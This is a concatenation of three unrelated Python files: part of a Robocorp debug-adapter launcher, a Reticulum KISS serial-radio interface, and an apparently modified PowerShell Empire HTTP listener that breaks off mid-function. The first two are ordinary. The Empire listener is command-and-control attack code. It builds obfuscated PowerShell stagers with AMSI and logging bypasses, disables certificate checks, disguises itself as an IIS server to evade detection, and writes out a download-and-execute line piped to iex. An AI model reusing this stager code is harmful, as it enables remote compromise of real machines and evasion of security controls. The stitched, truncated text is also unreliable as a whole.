if robot_yaml is None:
return mark_invalid("robot not provided in launch.")
if not os.path.exists(robot_yaml):
return mark_invalid("File: %s does not exist." % (robot_yaml,))
except:
log.exception("Error")
return mark_invalid("Error checking if robot (%s) exists." % (robot_yaml,))
self._cwd = os.path.dirname(robot_yaml)
try:
if self._cwd is not None:
if not os.path.exists(self._cwd):
return mark_invalid(
"cwd specified does not exist: %s" % (self._cwd,)
)
except:
log.exception("Error")
return mark_invalid("Error checking if cwd (%s) exists." % (self._cwd,))
if get_log_level() > 1:
log.debug("Run in debug mode: %s\n" % (self._run_in_debug_mode,))
try:
config = Config()
config_provider = _DefaultConfigurationProvider(config)
rcc = Rcc(config_provider=config_provider)
rcc_executable = rcc.get_rcc_location()
if not os.path.exists(rcc_executable):
return mark_invalid(f"Expected: {rcc_executable} to exist.")
except:
log.exception("Error")
return mark_invalid("Error getting rcc executable location.")
else:
task_args = []
if task_name:
task_args.append("--task")
task_args.append(task_name)
env_json_path = Path(robot_yaml).parent / "devdata" / "env.json"
exists_env_json = env_json_path.exists()
# Compute the space name
try:
with open(robot_yaml, "r") as stream:
yaml_contents = yaml_wrapper.load(stream)
except:
log.exception(f"Error loading {robot_yaml} as yaml.")
return mark_invalid(f"Error loading {robot_yaml} as yaml.")
if not isinstance(yaml_contents, dict):
return mark_invalid(f"Expected dict as root in: {robot_yaml}.")
conda_config = yaml_contents.get("condaConfigFile")
if not conda_config:
return mark_invalid(f"Could not find condaConfigFile in {robot_yaml}")
parent: Path = Path(robot_yaml).parent
conda_yaml_path = parent / conda_config
if not conda_yaml_path.exists():
return mark_invalid(f"conda.yaml does not exist in {conda_yaml_path}")
try:
conda_yaml_contents = conda_yaml_path.read_text("utf-8", "replace")
except:
log.exception(f"Error loading {conda_yaml_path} contents.")
return mark_invalid(f"Error loading {conda_yaml_path} contents.")
notify_event = threading.Event()
import time
def notify_elapsed_time():
initial_time = time.time()
notify_event.wait(5)
if notify_event.is_set():
return
output_event = OutputEvent(
OutputEventBody(
"Computing and creating environment (this can take some minutes)...\n",
category="stderr",
)
)
debug_adapter_comm.write_to_client_message(output_event)
while True:
notify_event.wait(9.33)
elapsed = time.time() - initial_time
if not notify_event.is_set():
output_event = OutputEvent(
OutputEventBody(
"Elapsed: %.1fs\n" % (elapsed,), category="stderr"
)
)
debug_adapter_comm.write_to_client_message(output_event)
t = threading.Thread(target=notify_elapsed_time)
t.daemon = True
t.start()
try:
robot_yaml_env_info: ActionResult[
IRobotYamlEnvInfo
] = rcc.get_robot_yaml_env_info(
Path(robot_yaml),
conda_yaml_path,
conda_yaml_contents,
env_json_path if exists_env_json else None,
)
finally:
notify_event.set()
if not robot_yaml_env_info.success:
return mark_invalid(robot_yaml_env_info.message)
robot_yaml_env_info_result: Optional[
IRobotYamlEnvInfo
] = robot_yaml_env_info.result
if not robot_yaml_env_info_result:
return mark_invalid(
"Internal error: robot_yaml_env_info_result not available."
)
space_name = robot_yaml_env_info_result.space_info.space_name
cmdline = (
[
rcc_executable,
"task",
"run",
"--robot",
robot_yaml,
"--space",
space_name,
]
+ task_args
+ args
)
if self._rcc_config_location:
cmdline.append("--config")
cmdline.append(self._rcc_config_location)
if exists_env_json:
use_path: str = str(env_json_path)
for var_name in self.MANAGED_ENV_VARIABLES:
if var_name in self._env:
try:
use_path = self._collect_env_json_without_managed_vars(
env_json_path
)
except:
log.exception("Error collecting managed env json.")
break
cmdline.append("-e")
cmdline.append(use_path)
cmdline.append("--controller")
cmdline.append("RobocorpCode")
self._cmdline = cmdline
MANAGED_ENV_VARIABLES = [
"RPA_OUTPUT_WORKITEM_PATH",
"RPA_INPUT_WORKITEM_PATH",
"RPA_WORKITEMS_ADAPTER",
]
def _collect_env_json_without_managed_vars(self, env_json_path: Path) -> str:
"""
If the existing env.json has some managed environment variable, a new
env.json without those variables is created and returned to be used for
the RCC launch (otherwise the original is returned).
"""
import json
changed = False
current_env_contents = json.loads(env_json_path.read_text("utf-8"))
if not isinstance(current_env_contents, dict):
raise RuntimeError(f"Expected {env_json_path} contents to be a json dict.")
# Ok, let's update the file if there are work-item related
# variables in the env.json.
from tempfile import NamedTemporaryFile
temp_file = NamedTemporaryFile(delete=False)
# Environment variables managed by the extension should
# be removed from the base env.json.
for env_name in self.MANAGED_ENV_VARIABLES:
if env_name in current_env_contents and env_name in self._env:
changed = True
del current_env_contents[env_name]
if changed:
temp_file.write(json.dumps(current_env_contents).encode("utf-8"))
temp_file.close()
def on_exit():
try:
os.remove(temp_file.name)
except:
# If it was already removed, that's ok.
pass
self._on_exit_callbacks.append(on_exit)
return str(temp_file.name)
return str(env_json_path)
@property
def valid(self):
return self._valid
@property
def run_in_debug_mode(self):
return self._run_in_debug_mode
def notify_exit(self):
if self._sent_terminated.is_set():
return
try:
self._sent_terminated.set()
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
TerminatedEvent,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
TerminatedEventBody,
)
debug_adapter_comm = self._weak_debug_adapter_comm()
if debug_adapter_comm is not None:
restart = False
terminated_event = TerminatedEvent(
body=TerminatedEventBody(restart=restart)
)
debug_adapter_comm.write_to_client_message(terminated_event)
finally:
for c in self._on_exit_callbacks:
try:
c()
except:
log.exception("Error on exit callback.")
def launch(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
RunInTerminalRequest,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
RunInTerminalRequestArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import OutputEvent
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import OutputEventBody
from robocorp_code_debug_adapter.constants import TERMINAL_NONE
from robocorp_ls_core.robotframework_log import get_log_level
from robocorp_code_debug_adapter.constants import TERMINAL_EXTERNAL
from robocorp_code_debug_adapter.constants import TERMINAL_INTEGRATED
# Note: using a weak-reference so that callbacks don't keep it alive
weak_debug_adapter_comm = self._weak_debug_adapter_comm
terminal = self._terminal
if not weak_debug_adapter_comm().supports_run_in_terminal:
# If the client doesn't support running in the terminal we fallback to using the debug console.
terminal = TERMINAL_NONE
threads = []
if terminal == TERMINAL_NONE:
import subprocess
if get_log_level() > 1:
log.debug(
"Launching in debug console (not in terminal): %s"
% (self._cmdline,)
)
env = os.environ.copy()
env.update(self._env)
self._popen = subprocess.Popen(
self._cmdline,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
cwd=self._cwd,
env=env,
)
def on_output(output, category):
debug_adapter_comm = weak_debug_adapter_comm()
if debug_adapter_comm is not None:
output_event = OutputEvent(
OutputEventBody(output, category=category)
)
debug_adapter_comm.write_to_client_message(output_event)
stdout_stream_thread = threading.Thread(
target=_read_stream,
args=(self._popen.stdout, on_output, "stdout"),
name="Read stdout",
)
stderr_stream_thread = threading.Thread(
target=_read_stream,
args=(self._popen.stderr, on_output, "stderr"),
name="Read stderr",
)
threads.append(stdout_stream_thread)
threads.append(stderr_stream_thread)
self._track_process_pid = self._popen.pid
elif terminal in (TERMINAL_INTEGRATED, TERMINAL_EXTERNAL):
kind = terminal
if get_log_level() > 1:
log.debug('Launching in "%s" terminal: %s' % (kind, self._cmdline))
debug_adapter_comm = weak_debug_adapter_comm()
cmdline = self._cmdline
if debug_adapter_comm is not None:
debug_adapter_comm.write_to_client_message(
RunInTerminalRequest(
RunInTerminalRequestArguments(
cwd=self._cwd, args=cmdline, kind=kind, env=self._env
)
)
)
# TODO: Get pid when running with terminal (get from response).
if self._track_process_pid is None:
log.debug("Unable to track if pid is alive (pid unavailable).")
else:
threads.append(
threading.Thread(
target=_notify_on_exited_pid,
args=(self.notify_exit, self._track_process_pid),
name="Track PID alive",
)
)
for t in threads:
t.daemon = True
t.start()
def disconnect(self, disconnect_request):
from robocorp_ls_core.basic import kill_process_and_subprocesses
if self._popen is not None:
if self._popen.returncode is None:
kill_process_and_subprocesses(self._popen.pid)
else:
kill_process_and_subprocesses(self._track_process_pid)
def send_to_stdin(self, expression):
popen = self._popen
if popen is not None:
try:
log.debug("Sending: %s to stdin." % (expression,))
def write_to_stdin(popen, expression):
popen.stdin.write(expression)
if not expression.endswith("\r") and not expression.endswith("\n"):
popen.stdin.write("\n")
popen.stdin.flush()
# Do it in a thread (in theory the OS could have that filled up and we would never complete
# trying to write -- although probably a bit far fetched, let's code as if that could actually happen).
t = threading.Thread(
target=write_to_stdin,
args=(popen, expression),
name="Send to STDIN",
)
t.daemon = True
t.start()
except:
log.exception("Error writing: >>%s<< to stdin." % (expression,))
|
KISSInterface.py
|
from .Interface import Interface
from time import sleep
import sys
import serial
import threading
import time
import RNS
class KISS():
FEND = 0xC0
FESC = 0xDB
TFEND = 0xDC
TFESC = 0xDD
CMD_UNKNOWN = 0xFE
CMD_DATA = 0x00
CMD_TXDELAY = 0x01
CMD_P = 0x02
CMD_SLOTTIME = 0x03
CMD_TXTAIL = 0x04
CMD_FULLDUPLEX = 0x05
CMD_SETHARDWARE = 0x06
CMD_READY = 0x0F
CMD_RETURN = 0xFF
@staticmethod
def escape(data):
data = data.replace(bytes([0xdb]), bytes([0xdb, 0xdd]))
data = data.replace(bytes([0xc0]), bytes([0xdb, 0xdc]))
return data
class KISSInterface(Interface):
MAX_CHUNK = 32768
owner = None
port = None
speed = None
databits = None
parity = None
stopbits = None
serial = None
def __init__(self, owner, name, port, speed, databits, parity, stopbits, preamble, txtail, persistence, slottime, flow_control, beacon_interval, beacon_data):
self.rxb = 0
self.txb = 0
if beacon_data == None:
beacon_data = ""
self.serial = None
self.owner = owner
self.name = name
self.port = port
self.speed = speed
self.databits = databits
self.parity = serial.PARITY_NONE
self.stopbits = stopbits
self.timeout = 100
self.online = False
self.beacon_i = beacon_interval
self.beacon_d = beacon_data.encode("utf-8")
self.first_tx = None
self.packet_queue = []
self.flow_control = flow_control
self.interface_ready = False
self.flow_control_timeout = 5
self.flow_control_locked = time.time()
self.preamble = preamble if preamble != None else 350;
self.txtail = txtail if txtail != None else 20;
self.persistence = persistence if persistence != None else 64;
self.slottime = slottime if slottime != None else 20;
if parity.lower() == "e" or parity.lower() == "even":
self.parity = serial.PARITY_EVEN
if parity.lower() == "o" or parity.lower() == "odd":
self.parity = serial.PARITY_ODD
try:
RNS.log("Opening serial port "+self.port+"...")
self.serial = serial.Serial(
port = self.port,
baudrate = self.speed,
bytesize = self.databits,
parity = self.parity,
stopbits = self.stopbits,
xonxoff = False,
rtscts = False,
timeout = 0,
inter_byte_timeout = None,
write_timeout = None,
dsrdtr = False,
)
except Exception as e:
RNS.log("Could not open serial port "+self.port, RNS.LOG_ERROR)
raise e
if self.serial.is_open:
# Allow time for interface to initialise before config
sleep(2.0)
thread = threading.Thread(target=self.readLoop)
thread.setDaemon(True)
thread.start()
self.online = True
RNS.log("Serial port "+self.port+" is now open")
RNS.log("Configuring KISS interface parameters...")
self.setPreamble(self.preamble)
self.setTxTail(self.txtail)
self.setPersistence(self.persistence)
self.setSlotTime(self.slottime)
self.setFlowControl(self.flow_control)
self.interface_ready = True
RNS.log("KISS interface configured")
else:
raise IOError("Could not open serial port")
def setPreamble(self, preamble):
preamble_ms = preamble
preamble = int(preamble_ms / 10)
if preamble < 0:
preamble = 0
if preamble > 255:
preamble = 255
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_TXDELAY])+bytes([preamble])+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("Could not configure KISS interface preamble to "+str(preamble_ms)+" (command value "+str(preamble)+")")
def setTxTail(self, txtail):
txtail_ms = txtail
txtail = int(txtail_ms / 10)
if txtail < 0:
txtail = 0
if txtail > 255:
txtail = 255
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_TXTAIL])+bytes([txtail])+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("Could not configure KISS interface TX tail to "+str(txtail_ms)+" (command value "+str(txtail)+")")
def setPersistence(self, persistence):
if persistence < 0:
persistence = 0
if persistence > 255:
persistence = 255
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_P])+bytes([persistence])+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("Could not configure KISS interface persistence to "+str(persistence))
def setSlotTime(self, slottime):
slottime_ms = slottime
slottime = int(slottime_ms / 10)
if slottime < 0:
slottime = 0
if slottime > 255:
slottime = 255
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_SLOTTIME])+bytes([slottime])+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("Could not configure KISS interface slot time to "+str(slottime_ms)+" (command value "+str(slottime)+")")
def setFlowControl(self, flow_control):
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_READY])+bytes([0x01])+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
if (flow_control):
raise IOError("Could not enable KISS interface flow control")
else:
raise IOError("Could not enable KISS interface flow control")
def processIncoming(self, data):
self.rxb += len(data)
self.owner.inbound(data, self)
def processOutgoing(self,data):
datalen = len(data)
if self.online:
if self.interface_ready:
if self.flow_control:
self.interface_ready = False
self.flow_control_locked = time.time()
data = data.replace(bytes([0xdb]), bytes([0xdb])+bytes([0xdd]))
data = data.replace(bytes([0xc0]), bytes([0xdb])+bytes([0xdc]))
frame = bytes([KISS.FEND])+bytes([0x00])+data+bytes([KISS.FEND])
written = self.serial.write(frame)
self.txb += datalen
if data == self.beacon_d:
self.first_tx = None
else:
if self.first_tx == None:
self.first_tx = time.time()
if written != len(frame):
raise IOError("Serial interface only wrote "+str(written)+" bytes of "+str(len(data)))
else:
self.queue(data)
def queue(self, data):
self.packet_queue.append(data)
def process_queue(self):
if len(self.packet_queue) > 0:
data = self.packet_queue.pop(0)
self.interface_ready = True
self.processOutgoing(data)
elif len(self.packet_queue) == 0:
self.interface_ready = True
def readLoop(self):
try:
in_frame = False
escape = False
command = KISS.CMD_UNKNOWN
data_buffer = b""
last_read_ms = int(time.time()*1000)
while self.serial.is_open:
if self.serial.in_waiting:
byte = ord(self.serial.read(1))
last_read_ms = int(time.time()*1000)
if (in_frame and byte == KISS.FEND and command == KISS.CMD_DATA):
in_frame = False
self.processIncoming(data_buffer)
elif (byte == KISS.FEND):
in_frame = True
command = KISS.CMD_UNKNOWN
data_buffer = b""
elif (in_frame and len(data_buffer) < RNS.Reticulum.MTU):
if (len(data_buffer) == 0 and command == KISS.CMD_UNKNOWN):
# We only support one HDLC port for now, so
# strip off the port nibble
byte = byte & 0x0F
command = byte
elif (command == KISS.CMD_DATA):
if (byte == KISS.FESC):
escape = True
else:
if (escape):
if (byte == KISS.TFEND):
byte = KISS.FEND
if (byte == KISS.TFESC):
byte = KISS.FESC
escape = False
data_buffer = data_buffer+bytes([byte])
elif (command == KISS.CMD_READY):
self.process_queue()
else:
time_since_last = int(time.time()*1000) - last_read_ms
if len(data_buffer) > 0 and time_since_last > self.timeout:
data_buffer = b""
in_frame = False
command = KISS.CMD_UNKNOWN
escape = False
sleep(0.05)
if self.flow_control:
if not self.interface_ready:
if time.time() > self.flow_control_locked + self.flow_control_timeout:
RNS.log("Interface "+str(self)+" is unlocking flow control due to time-out. This should not happen. Your hardware might have missed a flow-control READY command, or maybe it does not support flow-control.", RNS.LOG_WARNING)
self.process_queue()
if self.beacon_i != None and self.beacon_d != None:
if self.first_tx != None:
if time.time() > self.first_tx + self.beacon_i:
RNS.log("Interface "+str(self)+" is transmitting beacon data: "+str(self.beacon_d.decode("utf-8")), RNS.LOG_DEBUG)
self.first_tx = None
self.processOutgoing(self.beacon_d)
except Exception as e:
self.online = False
RNS.log("A serial port error occurred, the contained exception was: "+str(e), RNS.LOG_ERROR)
RNS.log("The interface "+str(self)+" experienced an unrecoverable error and is being torn down. Restart Reticulum to attempt to open this interface again.", RNS.LOG_ERROR)
if RNS.Reticulum.panic_on_interface_error:
RNS.panic()
def __str__(self):
return "KISSInterface["+self.name+"]"
|
http_new.py
|
from __future__ import print_function
from builtins import str
from builtins import object
import logging
import base64
import sys
import random
import string
import os
import ssl
import time
import copy
import json
import sys
from pydispatch import dispatcher
from flask import Flask, request, make_response, send_from_directory
import commands
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
from lib.common import templating
from lib.common import obfuscation
from lib.common import bypasses
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'Cookie': {
'Description': 'Custom Cookie Name',
'Required': False,
'Value': ''
},
'StagerURI': {
'Description': 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required': False,
'Value': ''
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'SlackToken': {
'Description': 'Your SlackBot API token to communicate with your Slack instance.',
'Required': False,
'Value': ''
},
'SlackChannel': {
'Description': 'The Slack channel or DM that notifications will be sent to.',
'Required': False,
'Value': '#general'
},
'DomainCheck' : {
'Description' : 'Check whether in domain else not execute',
'Required' : False,
'Value' : ''
},
'BackupHostsSource' : {
'Description' : 'Url where to get backupHosts to use when up to StagerRetries.',
'Required' : False,
'Value' : ''
},
'SwitchRetry' : {
'Description' : 'Url where to get backupHosts to use when up to StagerRetries.',
'Required' : True,
'Value' : 5
},
}
# required:
self.mainMenu = mainMenu
self.threads = {}
self.dotnetVersion = {'20':'35','40':'45'}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
self.session_cookie = ''
# check if the current session cookie not empty and then generate random cookie
if self.session_cookie == '':
self.options['Cookie']['Value'] = self.generate_cookie()
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;}',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
backupHostsSource = listenerOptions['BackupHostsSource']['Value']
domainCheck = listenerOptions['DomainCheck']['Value']
switchRetry = listenerOptions['SwitchRetry']['Value']
cookie = listenerOptions['Cookie']['Value']
# generate new cookie if the current session cookie is empty to avoid empty cookie if create multiple listeners
if cookie == '':
generate = self.generate_cookie()
listenerOptions['Cookie']['Value'] = generate
cookie = generate
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
stager += bypasses.scriptBlockLogBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
stager += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
stager += bypasses.AMSIBypass2()
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + "=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='" + userAgent + "';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + '.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
stager += proxy.lower()
stager += helpers.randomize_capitalization("');")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Proxy = $proxy;")
if proxyCreds.lower() != 'none':
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "','" + domain + "');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "');"
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = $netcred;")
# save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $" + helpers.generate_random_script_var_name("wc") + ".Proxy;"
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization(
'$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization(
"try{$ig=$" + helpers.generate_random_script_var_name(
"wc") + ".DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
#autorun=helpers.enc_powershell("$a=New-Object System.Net.WebClient;$a.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$a.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;$a.DownloadString(\""+host+"/download/po\")|iex;")
#cmd="do{try{[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$a=New-Object System.Net.WebClient;$a.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$a.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;$a.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;$a.DownloadString('"+host+"/download/po')|iex;break;}catch{write-verbose $_.Exception.Message -Verbose;}}while($true);"
cmd="[Net.ServicePointManager]::SecurityProtocol=3072;[Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$a=New-Object System.Net.WebClient;$a.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$a.Credentials=$a.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;$retry=0;$ho='%s';while(%s){try{$retry=$retry+1;$b=$a.GetType();$b.InvokeMember('DownloadString','Public,InvokeMethod,Instance',$null,$a,$ho+'/download/po')|iex;break;}catch{sleep(10);if($retry -eq %s){$ho='%s'}}}" % (host,"$true" if domainCheck =='' else "[Environment]::UserDomainName -eq '"+domainCheck+"'",switchRetry,host if backupHostsSource=='' else backupHostsSource)
#stager+="$filename=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"dXBkYXRlLnZicw==\"));"
